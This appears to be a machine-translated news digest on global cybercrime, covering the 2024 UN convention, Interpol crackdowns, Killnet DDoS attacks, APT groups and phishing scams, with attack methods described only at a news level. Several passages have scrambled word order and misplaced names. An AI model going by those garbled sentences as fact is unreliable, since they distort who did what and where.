Cybercrime in the world

Main article: Information security

What is cybercrime

Main article: Cybercrime

Cybercrime is illegal, illegal acts carried out by people using information and telecommunication technologies, computers and computer networks for criminal purposes.

Cybercrime in countries

• Cybercrime and cyber conflicts: Russia
• Cybercrime and cyber conflicts: Ukraine
• Cybercrime and cyber conflicts: US
• Cybercrime and cyber conflicts: Europe
• Cybercrime and cyber conflicts: China
• Cybercrime and cyber conflicts: Israel
• Cybercrime and cyber conflicts: Iran
• Cybercrime and cyber conflict: India

Cyber wars between countries

Information on agreements on electronic non-aggression, as well as on cyber conflicts between countries, is highlighted in a separate article:

• Cyber wars

Cybercrime in the commercial sector

An overview of cybercrime events in the banking sector is provided in a separate article:

• Information security in banks

Losses from cybercrime

An overview of the losses of the global economy from cybercrime in the article:

• Losses from cybercrime

User Data Rates

Analysis of the working conditions of hackers in the article

• Prices for user data in the cybercriminal market

Cyber attacks

Types of cyber attacks and overview of key events.

• Cyber attacks

• The number of cyber attacks in Russia and in the world

• Mobile Network Security Threats

2024

UN adopted a Russian-initiated document coordinating countries in the fight against cybercrime

At a meeting on August 7, a draft UN convention against cybercrime (A/AC.291/L.15) was adopted^[1], which criminalizes ten crimes in cyberspace, allows traffic control and collection of meta-data files, and also involves the creation of a network of state contact centers for the exchange of information collected to prove crimes. The text of the convention is partially agreed - there are fragments adopted by everyone at the vote, there are - adopted behind the scenes, and there are - not agreed.

Broadcast^[2] voice to the UN for the convention

In particular, the agreed types of cybercrime are as follows: illegal interception, impact on the information and communication system, misuse of devices, harassment or creation of a relationship of trust in order to commit a sexual crime against a child and laundering the proceeds of crime.

The compositions of crimes that caused disagreement in the adoption of the convention include the following: illegal access, exposure to electronic data, forgery using the information and communication system, theft or fraud using the information and communication system, crimes related to posting materials on the Internet with scenes of sexual abuse of children or their sexual exploitation, and the distribution of intimate images without consent.

Russia proposed to significantly expand the scope of the convention to include 23 types of offenses, "Oleg Shakirov, an analyst at SearchInform and a consultant at the PIR Center, wrote in his telegram channel. - However, this approach was not shared by all countries: the United States and Europe actively involved in the work on the document advocated a narrower coverage, which would be limited to purely computer crimes. Although Russia is the initiator of the development of a new convention, it is not satisfied not only with the narrow scope to which negotiators eventually came, but also with other points, for example, provisions regarding human rights. The struggle to exclude them went until the last moment - at the meeting, Iran put to a vote several points with which Russia did not agree.

Indeed, the convention turned out to be strange - out of ten offenses, three relate to the sexual sphere: creating a relationship of trust in order to commit a sexual crime against a child, crimes related to posting materials on the Internet with scenes of sexual abuse of children or their sexual exploitation, and distributing intimate images without consent. At the same time, there is not a single composition on the harm to life and property of people, such as involvement in terrorist activities or inclination to suicide, impact on critical information infrastructure, creation, use and distribution of malware, as well as incitement to subversion. These formulations were listed in the first versions of the convention.

Nevertheless, the adopted draft convention will allow legalizing tools for investigating computer crimes at the international level. In particular, the convention permits the following procedural actions: the collection in real time of traffic data and the prompt provision of security and partial disclosure of traffic data (interception and collection of traffic with the provision of this information to law enforcement agencies - in fact, the "Spring Law" and SORM), interception of content data (meta-information on transmitted data), search and seizure of stored electronic data, freezing, seizure and confiscation of proceeds of crime, and witness protection.

To carry out all these actions, it is planned to create an international network of contact centers that will interact with each other to assist in the mutual exchange of information that is necessary for the investigation of crimes. Moreover, these centers must interact in real time, for which to work 24 hours a day without days off. At the same time, such centers, although they can carry out the above procedural actions, such as arrests of accounts or searches, at the request of other states, can nevertheless comply with their sovereignty.

The generally accepted procedure for investigating international incidents did not exist at the moment, "Pavel Kuznetsov, director of strategic alliances and interaction with state authorities of the Garda group of companies, said for TAdviser. - The Convention is just an attempt to create a foundation for the subsequent concretization of such an order. And, as we can see, even at the level of fundamental entities, the very composition of the convention, there are specific contradictions in approaches. In particular, Western "partners" are trying to narrow the range of offenses in question to those related to "cybersecurity." Information security remains out of the attention zone. And subsequently, such provisions are widely used for "convenient" interpretation and attempts to deeply political influence for purposes that are completely inconsistent with the meaning of the original document.

Indeed, the generally recognized procedure for investigating international cybercrime did not exist until recently - all procedures were carried out privately through the direct interaction of law enforcement units of countries. There was no common system for all, and this was the main task of adopting the signed draft convention at the UN level.

It is gratifying that the document reflected Russian proposals for the creation of a single register of contact points for the exchange of information about cybercrimes, - said Pavel Kuznetsov. - The existing mechanisms greatly bureaucratized and slowed down this process, and the allocation of specific responsible units of the relevant bodies is designed to simplify and speed it up. Obviously, such units will be national CERTs - centers for monitoring, countering computer attacks and coordinating relevant areas of activity. It looks optimistic, but we should expect some difficulties.

Actually, contact centers have already been created in some countries today. In particular, in Russia, NCCCA is responsible for such activities as a service that controls State system of detection, prevention and elimination of consequences of computer attacks. However, similar contact centers are not available in all participating states, so critical issues remain open to them: personnel, legislative details of the authority of the center within each participating country, and the material and technical base. All of them, according to the idea, should be decided by the country in preparation for the ratification of the convention. Thus, the harmonization of criminal law in various countries can be carried out, which will allow us to come to uniform rules for the investigation of cybercrime.

The Convention unifies approaches to the suppression and investigation of cybercrimes and mutual legal assistance at the international level, - Yulia Shlychkova, vice president of Kaspersky Lab for government relations, expressed her opinion to TAdviser. - Even partial standardization of the legal regulations of different states simplifies the collection and exchange of information on crimes and creates mechanisms for cross-border interaction. In particular, a positive step in this direction is the creation of a network of national contact centers, which in 24/7 mode will maintain communication with each other to suppress and promptly investigate cybercrime, will be able to exchange electronic evidence. One way or another, the convention lays the legal framework for wide international interaction in the fight against cybercrime, but requires further adjustment and harmonization of technical standards.

The adopted document indicates the following dates for its entry into force. All states parties can sign the convention by December 31, 2026. Moreover, not only individual states can ratify it, but also entire regional organizations of economic integration, uniting several countries. 90 days after receiving 40 instruments of ratification from individual states, the convention enters into force. Thereafter, a Conference of States Parties to the Convention shall be organized to ensure the achievement of the objectives of the Convention and to monitor its observance. The first amendments to the text of the document can be made no earlier than 5 years from the date of entry into force of the convention.

Fraudsters began to create fake Internet access points on board planes to steal passenger data

In early July Australia 2024, he was charged with fraud and theft of aircraft passenger data. Australian Federal Police say the 42-year-old defendant created fake Wi-Fi hotspots at Australian airports and on domestic flight planes to trick users into entering their personal details. More. here

The servers of the South Korean manufacturer of ERP systems have been hacked. Now companies are attacking around the world

On July 1, 2024, the AhnLab SEcurve Intelligence Center (ASEC) reported that the servers of an unnamed South Korean manufacturer of ERP systems were hacked. After the invasion, attackers began to attack companies around the world, and the main targets are Korean defense and production enterprises. Read more here.

Hackers in Cambodia, Laos and Myanmar earn 40% of these countries' combined GDP

Southeast Asia has become the center of global. cyber attacks Hackers earn $64 billion a year there, and in, the To Cambodia Laos To Myanmar income of cybercriminals reaches $43.8 billion, which corresponds to 40% of the total of these GDP countries. Such data are given in a study by the Institute of Peace (USIP) USA , which was released in May 2024.

The most popular fraud scheme among swindlers from Southeast Asia is the so-called "Pig Butchering." When using such a scheme, attackers enter into confidence in victims under romantic or financial pretexts, communicate with them for a long time for several weeks or months. The goal of a fraudster is to build at least a friendly, and ideally romantic relationship with a person.

Southeast Asia has become the center of global cyber attacks

In a very short period of time, this problem has turned from regional to global, "says Jason Tower, director of the USIP unit in Myanmar. - More countries are facing this fraud. Fraudsters are creating new criminal links in the Middle East and Africa.

A study published in May 2024 said there had been a sharp rise in the number of cyber attacks on non-Chinese speakers in recent months. Perhaps this was the result of the work of the Chinese authorities to control Internet fraud.

Criminal syndicates in Southeast Asia attract people for online fraud and often force them to do so under the threat of physical violence. Victims of forced labor come from more than 60 countries. In Myanmar, fraudulent centers are defended by the armed forces, in Cambodia, criminal structures use hotels and casinos empty after the pandemic, and in Laos, specialized economic zones.^[3]

2023

Interpol arrested 3,500 people and $300 million in 34 countries in the case of a global network of cyber criminals

On December 19, 2023, Interpol announced that 3,500 suspects had been arrested during a large-scale international operation to combat financial crimes on the Internet. At the same time, assets worth approximately $300 million were confiscated in 34 countries.

In the anti-crime campaign lasting about six months (from July to December 2023),,,,,,,,,,,,,,,,,,,,,, and Australia Cambodia Hong Kong India Indonesia Ireland Japan Malaysia Nigeria Pakistan Philippines Singapore South Africa others took part Spain. Sweden Thailand UAE The purpose of Britain USA the operation states was to combat seven types of cyber fraud: voice, deception in phishing the romantic sphere, extortion on the Internet, investment crimes, money laundering in the illegal gambling market, business email compromise fraud and fraud in the commercial field.

As a result of the measures, law enforcement agencies blocked 82,112 suspicious bank accounts, confiscating a total of $199 million in ordinary money and about $101 million in virtual assets. It is noted that the share of investment fraud, business email compromise and e-commerce fraud accounted for approximately 75% of all incidents investigated.

Working in conjunction with service providers, Interpol helped identify nearly 370 accounts of virtual assets linked to transnational organized crime. Police in different countries have frozen these assets, and the investigation is ongoing as of the end of 2023. During the operation, cooperation between the Philippine and Korean authorities made it possible to arrest a famous Internet gambling criminal in Manila: the attacker was wanted for two years.^[4]

How hackers hack hotels into Booking.com and demand money from customers

On December 1, 2023, Panda Security, a company specializing in information security solutions, announced a new cybercriminal scheme, the victims of which are users of the Internet hotel booking system Booking.com. Attackers steal personal data, and then convince customers to make fictitious payments. Read more here.

4 ports in Australia stopped work due to a cyber attack. 30 thousand containers hung

On November 10, 2023, DP World, the largest port operator, Australia was subjected to a powerful cyber attack that paralyzed the work of information infrastructure. It can take weeks to fully restore systems, which, according to experts, will provoke an increase in prices for a variety of goods in the country - from medicines to Christmas toys. More. here

Who and how hackers attack in the Middle East, and why billions of dollars are being pledged there for cybersecurity

The number and complexity of cyber attacks is growing around the world, but there are regional specifics in this area. Representatives of Kaspersky Lab, which has been working in the region for several years, spoke about the features of cybercrime and approaches to protection in the Middle East in October 2023 at the GITEX international exhibition in Dubai, where TAdviser visited.

The head of the Kaspersky Lab research center in the Middle East, Turkey and Africa, Amin Hasbini, in a conversation with TAdviser, noted that attacks on corporate users in the region often depend on the size of the organization. In the case of SMBs, they are often aimed at receiving payments and transfers to "black" accounts used to launder funds in different regions of the world, for example, in Asia or Latin America. Against organizations, ransomware is often used for this, requiring large ransoms.

Attacks on large organizations differ in their approaches. APT attacks (Advanced Persistent Threats) are often used here, which can cause much more damage. Often they are used for espionage. These may apply, for example, to banks or government organizations. And even against hospitals, because they store sensitive medical information about their clients.

Advanced attacks in the META region (Middle East, Turkey, Africa) in Kaspersky Lab are called the nightmare of users and organizations. This type of attack is characterized by the fact that attackers change their methods and tools to bypass protection, use advanced technical skills and tools to avoid detection, and often they are organized in such a way as to go unnoticed by the victim.

Anton Ivanov, director of research and development at Kaspersky Lab, cited data based on investigations conducted by their company that it is countries in the Middle East that are most often subjected to advanced attacks in the region. In 2023, the UAE, Egypt, Turkey, Jordan and Syria were among the top 5 most attacked countries. And the top 3 attackers in advanced attacks in the region are the hacker groups Lazarus (Andariel, cookietime, Bluenoroff), Kittens (CharmingKitten, Muddywater, Lyceum), as well as Chinese-speaking groups (Honeymyte, APT15, Plugx, Blackmoule).

One of the oldest and most famous hacker criminal groups operating in the region is OilRig, also known as APT34 and Helix Kitten. She was first noticed in 2012, and she is still acting, said Anton Ivanov. It predominantly attacks financial, energy, telecommunications and chemical companies.

Amin Hasmini notes the trend that when attacking large businesses in the region, cybercriminals tend to unite. Sometimes several criminal groups work together: one organizes penetration into the IT infrastructure, the other introduces malware, the third provides communication, for example, for blackmail and subsequent sale of data.

According to Amin Hasbini, this phenomenon can also be attributed to regional specifics: over the past couple of years, the hiring of hackers to carry out cybercriminal work has been gaining popularity in the Middle East. There are special companies (hack-for-hire) in which you can hire hackers for various tasks. Often they are attracted to competitive intelligence.

For example, there are two competing banks that, at the legal level, through lawyers, attack each other. And one of the banks hires a hacker team to hack into a competitor's systems, find sensitive or "dirty" information that can be used against the company in the future.

The information received is used to damage the company's reputation, or to be used by lawyers in legal disputes, explains Amin Hasbini.

Of course, this is illegal, but Kaspersky sees a lot of such activity in the Middle East region. A similar use of mercenary hackers can be found in Europe, including in Western organizations, but in the Middle East this type of hacking is very active.

It is possible that this is due to the fact that the region has very high competition in business, - believes Amin Hasbini.

This may also be due to some gaps in the current legislative framework, making it difficult to block and stop the activities of such criminals.

This is not to say that in recent years there have been more hackers in the Middle East, says Amin Hasbini. Rather, regional hackers have become characterized by teaming up to perform various tasks. Sometimes you can notice similar things in their activities, and then you can assume that they are the same group. The same group can attack industrial sites in the region, and the other - financial institutions, for example.

At the same time, IT systems and services in the Middle East have already reached a certain level of maturity, so it has become more difficult for attackers to compromise organizations. But, for example, in the industry in the field of operational technologies (OT), the situation is somewhat different, because for a long time no one has been engaged in cybersecurity in this area. In addition, many industrial systems that are used to supply water, electricity, in the field of atomic energy, etc., are old: they can be 10-20 years old, such systems are not quickly updated. And the damage from cyber attacks here can be huge, because this is a critical infrastructure.

One of the features of the Middle East region compared, for example, to Europe is that there are other priorities in the field of information security, and individual countries in the Middle East do not always work as together on the cybersecurity agenda as EU countries. Basically, each country seeks to develop in the field of information security on its own, explains Amin Hasbini.

At the same time, their own sovereignty is very important for each country in the Middle East, so they want to deploy their decisions locally. And for reasons of sovereignty, countries seek to pass laws that would oblige global vendors to localize so that they are present in the country, if anything.

Kaspersky Lab itself, for example, has offices in the UAE (here is the headquarters for the entire META region), Turkey and Saudi Arabia. Saudi Arabia has the most stringent requirements for local presence, so Kaspersky Lab also has a transparency center in this country, where customers can familiarize themselves with the source code of products, and use their local computing resources: some servers on their own site, and some from providers. This allows you to store data locally, which is important for local government, and send updates to customers faster.

In addition, penalties for cybercrime are often tougher in the Middle East than in Europe. Cybercrime is taken very seriously here and try to catch cybercrimes as quickly as possible. According to Amin Hasbini, Kaspersky Lab interacts with various local special services and shares information with them about cyber attacks to help them find attackers.

Many countries in the region are moving towards raising the maturity of their cyber defenses, they already have legal regimes to protect their states, governments and users from cyber threats. This is a matter of national security. Therefore, they are looking for advanced technologies to provide such protection. Projects in government agencies and on critical infrastructure are now among the largest, Amin Hasbini told TAdviser.

Kaspersky Lab sees the META region as a whole and the Middle East for itself, in particular, as a very promising market. According to ResearchAndMarkets estimates, the cybersecurity market in the Middle East was $20.3 billion in 2022, and in 2027 analysts predict its volume of $44.7 billion with an average annual growth of 17.1%^[5]

Rashid Al-Momani, general manager of the company for the Middle East, Egypt, Rwanda and Pakistan, says that large budgets for cybersecurity in the Middle East are laid, among other things, under the influence of geopolitical factors. In addition, if we take the UAE, various major international events are held there, for example, in the field of technology and sports, which attract more and more participants, which also requires better protection.

Taking into account the course towards strengthening cyber defense in the region, Kaspersky Lab is expanding its presence here, including the number of local teams, as well as strategic cooperation with local authorities, regulators, central banks, Rashid Al-Momani notes.

In addition to Kaspersky Lab, other domestic information security suppliers are showing more and more interest in the Middle East information security market: about 15 stands of companies from Russia were collectively present at GITEX, where the description declares cybersecurity as the main direction or one of the directions.

1.5 TB of data was stolen from the Argentine financial regulator. Hackers demand a ransom of $500 thousand and promise to destroy the banking system

In June 2023, the Argentine National Securities Commission was the victim of a cyber attack allegedly committed by the hacker group Medusa, which develops ransomware viruses. Hackers demand a large ransom of $500,000 within a week, otherwise threatening to leak 1.5 TB of documents and commission databases to the Internet. Read more here.

Updated Pakistani Trojan ReverseRAT targets Indian government agencies

Information security company ThreatMon has discovered a targeted phishing campaign targeting Indian government agencies that is leading to the deployment of an updated version of the ReverseRAT RAT Trojan. ThreatMon experts attributed this activity to the SideCopy group. This became known on February 21, 2023. Read more here.

Hackers attacked one of Canada's largest energy companies

In mid-January 2023, Canada's major electricity supplier Qulliq Energy was hit by a cyber attack that knocked computers out of service and left its customers unable to pay for services using bank cards. A substation in the city of Nunavut was damaged. Read more here.

APT group Dark Pink strikes Asian government and military structures

The APT group Dark Pink is delivering cyber strikes on Asian government and military structures. This became known on January 11, 2023.

During attacks, hackers use a set of powerful custom tools and new tactics.

In conducting the investigation, Group-IB stressed that Dark Pink could be a completely new APT group. The gang of hackers got its name because of the names of some electronic boxes to which the stolen data was sent. However, Chinese researchers gave it a different name - Saaiwc Group. Read more here.

One of the most complex chains of computer infection in history revealed

On January 5, 2023, Check Point Research (CPR) experts spoke about one of the most complex chains of infection in the history of cyber attacks, which the Blind Eagle group uses to organize attacks on victims in South America. Read more here.

2022

Hackers began to massively attack telecom operators around the world to take possession of someone else's phone number

On December 2, 2022, IT specialists CrowdStrike announced the discovery of a new cybercriminal scheme: attackers attack telecommunications companies and organizations in the field (outsourcing business processes BPO) in order to take possession of someone else's phone number.

The cybercriminal campaign is called Scattered Spider. Experts say the purpose of hackers is to gain access to the networks of mobile operators and carry out a substitution attack. SIM cards Subsequently, this method makes it possible to accept one-time passwords for financial transactions to bypass. As two-factor authentications a result, the funds of the victims can be stolen.

Various methods can be used to gain initial access to the attacked system. These are, in particular, social engineering schemes, including through phone calls and SMS notifications, as well as messages in instant messengers. Attackers impersonate IT professionals to force victims to enter credentials on a phishing page or download and install a specific remote access tool, such as AnyDesk, BeAnywhere, DWservice, Logmein, ManageEngine, N-Able, Pulseway or Rport. Moreover, cybercriminals use a personalized approach to obtain one-time passwords. In addition, vulnerabilities in the software can be exploited.

After penetrating the target system, hackers analyze Windows, Linux, Google Workspace, Azure Active Directory, Microsoft 365 and AWS environments. In addition, horizontal movement is performed. Additional tools can then be loaded to collect data on VPN parameters and multifactor authentication modules. It is noted that in most cases, attackers act extremely persistently and brazenly.^[6]

North Korean hacker group Kimsuky attacks South Korean political and diplomatic organizations

The - Kaspersky Lab the North Korean APT group Kimsuky is campaigning against political and diplomatic organizations, South Korea as well as South Korean university professors, think tank researchers and officials, according to the report governmental. This became known on August 25, 2022. More. here

The wave of Killnet cyber attacks crashed against Estonian defense systems

The wave of Killnet cyber attacks crashed against Estonian defense systems. This became known on August 19, 2022.

Large-scale DDoS attacks were aimed at state institutions and enterprises in Estonia.

Luukas Kristyan, Deputy Vice Chancellor for Digital Development of the Ministry of Economy and Communications of Estonia, announced large-scale hacker attacks on his Twitter. According to him, these were the most intense cyber attacks since 2007, aimed at both government agencies and the private sector.

At the same time, Luukas noted that the attacks committed by hackers were ineffective.

computer The head of the Estonian emergency response team, Tonu Tammer, clarified that the cyber attacks were aimed, in particular, at the websites of the police, government logistic and firms, but were able to cause only minor interruptions in the operation governmental IT of the systems.

The Killnet group claimed responsibility for the cyber attacks. Hackers said their attack was a response to the dismantling of the T-34 monument in Narva^[7].

Albania went offline after a cyber attack

Albania's National Agency for the Information Society (AKSHI, NAIS) has been forced to shut down government online services and government websites following an ongoing cyber attack. This became known on July 18, 2022.

Шаблон:Quote 'To counter these unprecedented and dangerous strikes, we were forced to shut down government systems until enemy attacks were neutralized, the agency said in a statement.

The national agency is on full alert and works around the clock with the Microsoft team, the Jones Group International team and groups of Albanian ICT companies to prevent the Albanian IT system from being damaged or compromised, AKSHI added.

The websites of the parliament and the prime minister's office are closed, as well as the e-Albania website, a government portal that should be used by all Albanians, as well as foreign residents and investors, in order to receive public services^[8]

Russian-speaking hackers from Killnet paralyzed the work of several Lithuanian government agencies

Hackers from the Killnet group, who warned the authorities Lithuania about the upcoming large-scale cyber attacks due to the blocking of railway transit of goods through the territory in, countries Kaliningrad region kept their promise and attacked Lithuanian. state structures This became known on June 27, 2022. It is clarified that many state Lithuanian structures are experiencing serious problems in their work at the end of June 2022, among which they have precisely suffered from a cyber attack: the State Tax Inspectorate, which is part of the Lithuanian Ministry finance , the official websites of the largest Lithuanian ports, and oil and gas the system throughout. video surveillances At the same time, to the country some attacked sites open, but users cannot get any services on them. The Killnet Telegram group's channel says that as a result of a large-scale hacker DDoS-attacks , it was possible to disable more than 1000 Lithuanian sites. hackers Russian-speaking also presented a screenshot from the main country to Lithuanian police sites indicating that the site was blocked.

1,089 Lithuanian sites were shut down due to a major glitch that is occurring at the local provider. Which provider - you will learn about this from official sources, - said in Killnet.

Foreign MEDIA people clarify that pro-Russian hackers of their Killnet attack Lithuanian state websites throughout the day. There are problems in the work of the official websites of Lithuanian airports, which could not connect to the systems of suppliers of financial servants. Websites of major telecommunication service providers in Lithuania were also affected by the DDoS attack, with some downloading unusually slowly and others failing altogether. The National Center cyber security of Lithuania (NCSC) a few days ago announced an increase in the number of DDoS attacks against the country, saying that the attackers were targeting government agencies, transport and the financial sectors^[9]

Killnet gang announce massive attack on Italy

The Killnet gang has announced a "massive and unprecedented" attack on Italy. This became known on May 30, 2022.

At the end of May 2022, the attacks did not cause problems for Italian organizations.

The pro-Russian hacktivist group Killnet is one of the most active non-state structures operating since the beginning of the special operation in Ukraine. Researchers from cyberknow have published a chronology of attacks conducted by hacktivists:

CyberKnown believes the hackers have merged into a semi-formal structured organization, KillNet Order of Battle (ORBAT).

With different levels of command and task setting. The analysis suggests that, regardless of the sophistication of the attacks, criminals have a reliable control and control structure, according to CyberKnown.

One of the main goals of the bandits is Italy. The group called for action banks MEDIA power from its members by giving them a list of Italian targets, including,, companies and more. Only three governmental websites were unavailable during the first wave of attacks.

Now the group has announced a massive attack on Italy, scheduled for 30 at 05:00, with the gang also threatening hacktivists Anonymous.

The following are messages published by Killnet on Telegram:

The Italian csirt has issued a warning that signs and threats of possible imminent attacks remain, in particular against national public organizations, private critical infrastructure organizations, or private organizations whose image is identified with the country^[10]

Russian hackers suspected of cyber attacks on German renewable power companies

Three the German renewable companies to power have been hacked due to countries the Russian oil waivers. This became known on April 27, 2022. More. here

RaidForums hacker forum for trading stolen databases closed

The US authorities blocked the work of RaidForums, a forum where stolen data was traded online. This is stated in a statement by the US Department of Justice, issued on April 12, 2022. The site was shut down by law enforcement agencies in the United States, United Kingdom, Sweden, Portugal and Romania in Operation TOURNIQUET, coordinated by Europol.

The US authorities have charged the founder and chief administrator of the forum, 21-year-old Diego Santos Coello from Portugal. He was detained on January 31 in the UK at the request of the American side. The U.S. Department of Justice is seeking his extradition, after which he will appear in U.S. District Court for the Eastern District of Virginia. Charges have been filed against Coelho on six counts, including conspiracy, fraudulently accessing devices and aggravated identity theft over his alleged role as RaidForums' chief administrator between January 1, 2015 and January 31, 2022. At the same time, the accused and his possible accomplices, according to the investigation, developed and administered the work of the software and computer infrastructure of the specified platform, established rules for users, and also advertised illegal RaidForums services.

The department said it received court approval to seize three different domain names that host the RaidForums website: raidforums.com, Rf.ws and Raid.lol.

According to the US Department of Justice, "hundreds of databases" containing stolen information were previously sold using RaidForums. The site sold stolen information to access bank accounts, o information , credit cards login credentials and social numbers. insurance

The size of the RaidForums market, according to the US Department of Justice, included hundreds of such data containing more than 10 billion units of credentials of individuals living in the United States and other states.

Along with the illegal data trade, even during the founding of the forum in 2015, RaidForum was a platform for organizing and supporting online bullying in the form of suppressing the operation of victims' communication devices by transmitting an overwhelming stream of data or the practice of falsely notifying law enforcement agencies of alleged situations, requiring immediate significant or even armed intervention from such bodies^[11]

2021

Interpol conducted the largest operation to detain cybercriminals

At the end of November 2021, Interpol conducted a large-scale operation to detain cybercriminals. During the operation, law enforcement agencies in more than 20 countries arrested more than 1,000 people and intercepted about $27 million in illegal funds as part of the fight against financial crimes using cyber technologies.

The operation, codenamed HAECHI-II, took place from June to September 2021. It was attended by specialized police units from 20 countries, including Hong Kong and Macau, which dealt with specific types of Internet fraud, such as romantic scams, investment fraud and money laundering related to illegal gambling on the Internet. As a result of this special operation, 1,000 people were arrested, and investigators closed 1.6 thousand cases. 2.3 thousand bank accounts related to illegal proceeds from financial crimes were blocked and 10 new criminal methods of work were identified. During the operation, Interpol staff tested a new global payment termination mechanism, the Rapid Response Anti-Money Laundering Protocol (ARRP), which proved crucial for successfully intercepting illicit funds in several cases in Operation HAECHI-II.

This is the second such operation in the framework of a project launched in 2019 to combat financial crimes using cyber technologies with the participation of Interpol member countries on all continents. Interpol plans to officially launch ARRP in 2022. For November 2021, its Financial Crime Unit is working with member countries to integrate the system into existing communication channels.

Only through this level of global cooperation and coordination can national law enforcement agencies effectively combat a parallel cybercrime pandemic. Using the new ARRP network, channels of international police cooperation were deployed between Interpol's bureaus in Bogota and Beijing Hong Kong to freeze the transferred funds... more than 94% of the money was intercepted in record time, said Interpol Secretary General Jurgen Stock.

Interpol reported that a well-known textile company in Colombia was defrauded by more than $8 million through a complex scam to compromise business emails. Posing as the legal representative of the company, the criminals ordered to transfer more than $16 million to two Chinese bank accounts. Half of the money was transferred before the company discovered the fraud and alerted local judiciary, which contacted Interpol's financial crime unit through its National Central Bureau (NCB).^[12]

South Korea has become a global center for digital sex blackmail

In mid-June 2021, it became known that the advanced technologies of South Korea caused a whole wave of digital crimes in the field of sex blackmail. The country has become a global hub for illegal filming and sharing of explicit images and videos, according to victims, researchers and rights groups. Read more here.

2020

Group-IB helped Interpol identify Nigerian criminals who attacked companies around the world

On November 25, 2020, Group-IB, an international company specializing in preventing cyber attacks, took part in Interpol's Falcon operation to curb the activities of cybercriminals from Nigeria.

The group, named by Group-IB TMT specialists, carried out massive hacks of corporate mail for several years and stole user authentication data from browsers, email and FTP servers, including for sale.

Criminals operating since at least 2017 have compromised at least 500,000 public and private companies in more than 150 countries, including Russia. Three cybercriminals were arrested in Lagos as a result of a cross-border operation involving Interpol's Cybercrime Directorate, Nigeria Police and Group-IB (International Cybercrime Investigation Unit, Singapore). The investigation continues, some members of the criminal group remain at large for November 2020.

The group was engaged in BEC attacks (from the English business email compromise - compromise of business mail) - this is a type of phishing attack based on social engineering. Phishing emails can be targeted at certain employees of an organization or sent out en masse. They often disguise themselves as money transfer requests, messages from the HR department or commercial offers and are designed to steal sensitive data.

Three members of the group, known by the initials "OC" (32 years), "IO" (34 years) and "OI" (35 years), whose identities were established through the use of Group-IB cybercriminal tracking technologies, as well as the operational work of the Group-IB international investigation team and the CERT-GIB Cyber Security Incident Response Centre, were arrested in Lagos by the Nigerian Cyber Police Unit as part of Operation Falcon. According to representatives of the Nigerian police, the information found on the devices of the arrested members of the TMT group confirmed their involvement in the criminal scheme and contained data belonging to at least 50 thousand victims.

Information about the alleged attackers that Group-IB was able to track was transferred to the Interpol Cybercrime Office.

To send phishing emails, the attackers used the Gammadyne Mailer and Turbo-Mailer tools. In addition, they used the MailChimp platform to see if the victim had opened the received message.

To avoid detection and tracking by traditional security systems, the group uses public cryptors. To communicate with the command server, attackers, in particular, used SMTP, FTP, HTTP protocols.

Parliament website hacked in Kyrgyzstan

The Kyrgyz parliament announced the hacking of its official website and the demands of hackers The Black Pirate $10 thousand as a ransom. This became known on October 19, 2020. Read more here.

Hacking major DNA databases, stealing genealogical profiles

At the end of July 2020, it became known that the GEDmatch DNA database, which allows users to search for relatives based on DNA data, was hacked. The hackers used the received email addresses in a phishing attack on another leading genealogy site, MyHeritage. Read more here.

Germany announced an international search for a Russian accused of cyber attacks on the Bundestag

In early May 2020 Germany , the Prosecutor General's Office issued an arrest warrant, Dmitry Badin which is accused of cyber attacks on the Bundestag. The 29-year-old Russian has been put on the international wanted list. More. here

Revealed 1.3 thousand malware with the name of video conferencing services

In mid-April 2020, Kaspersky Lab announced the detection of about 1.3 thousand malicious programs that disguise themselves as popular video conferencing services, including Zoom, Webex and Slack.

According to the Russian antivirus developer, with the help of such a scheme, about 200 types of threats are distributed, mainly advertising applications - DealPly and DownloadSponsor. Both software are installers that display ads or load ad modules.

As a result of attacks by such programs, a person's confidential information without his consent may end up on the servers of third parties.

According to Kaspersky Lab, the danger of advertising software that mimics the names of services should not be underestimated. As a result of attacks by such programs, a person's confidential information without his consent may end up on the servers of third parties. Moreover, the amount of data that such programs collect is really diverse: user preferences, search history, geolocation and much more, the company explained.

Platforms for online conferences have now gained great popularity in the world, they are used in large and small companies to organize video conferencing, ordinary users turn to them to communicate with friends and family, so we cannot exclude that the number of malicious files that exploit the names of such services will grow in the near future , - commented security expert at Kaspersky Lab Denis Parinov.

As for the popularity of this or that service among cybercriminals, the shares were distributed as follows: in the first place Zoom (42.42%), the second went to WebEx (22.51%), the third - GoToMeeting (12.86%).

In addition, threats were found that hide under the guise of.lnk files - shortcuts to applications. The vast majority of these files actually turned out to be malicious elements that exploit vulnerabilities in various programs.^[13]

How cybercriminals make millions from coronavirus

On March 13, 2020, the antivirus company Eset released a message about how cybercriminals are profiting from the coronavirus.

According to experts, attackers are spreading news on behalf of the World Health Organization (WHO), urging users to follow malicious links to obtain allegedly secret and extremely important information about the virus. Thus, they steal personal information and payment data, gaining access to the accounts of victims. Eset recommends being more careful and checking the e-mail address from which the message came: for example, the addresses @ who.com, @ who.org or @ who-safety.org are not related to WHO.

Fraudsters also resort to fake charity actions, creating mailings calling for a donation to find a coronavirus vaccine for children in China.

In addition, fraud with fake ads for the sale of medical masks and hand antiseptics is gaining popularity. With their help, attackers lure out user credit card data and steal money from accounts. So, according to Sky News, only in February 2020 in the UK, criminals earned at least 800 thousand pounds ($1 million) from such a campaign.

Eset advises not to succumb to panic in society and be especially attentive to any resources and mailings containing a mention of the coronavirus. It is necessary to beware of fraudulent charities or crowdfunding campaigns aimed at combating the epidemic, as well as ignore messages that request your personal or payment information. Another measure of protection against cybercriminals is to use comprehensive antivirus solutions with email protection modules and phishing protection.^[14]

Cybercriminals detained in Indonesia who infected hundreds of online stores around the world

On January 27, 2020, it became known that the cyber police Indonesia , together with Interpol Group-IB , detained members of a criminal group who infected hundreds of JavaScript malicious code online stores in,,,, and Australia Brazil Great Britain Germany Indonesia other USA countries of the world with sniffers - a popular species. There are the Russian the Ukrainian also users among the victims. Criminals stole from bank buyers data cards and used them to buy gadgets and luxury goods. The elimination of this criminal group was the first successful operation against JS sniffer operators in the Asia-Pacific region (APAC).

As reported, the joint operation "Night Fury" of the Indonesian cyber police, INTERPOL's ASEAN Cyber ​ ​ Capability Desk (ASEAN Desk) and the Group-IB investigation department at APAC was carried out in December 2019 - as a result, three Indonesian residents aged 23 to 35 were arrested. All of them are charged with stealing electronic data using GetBilling sniffers. The operation in 5 other regions of the Asia-Pacific region continues.

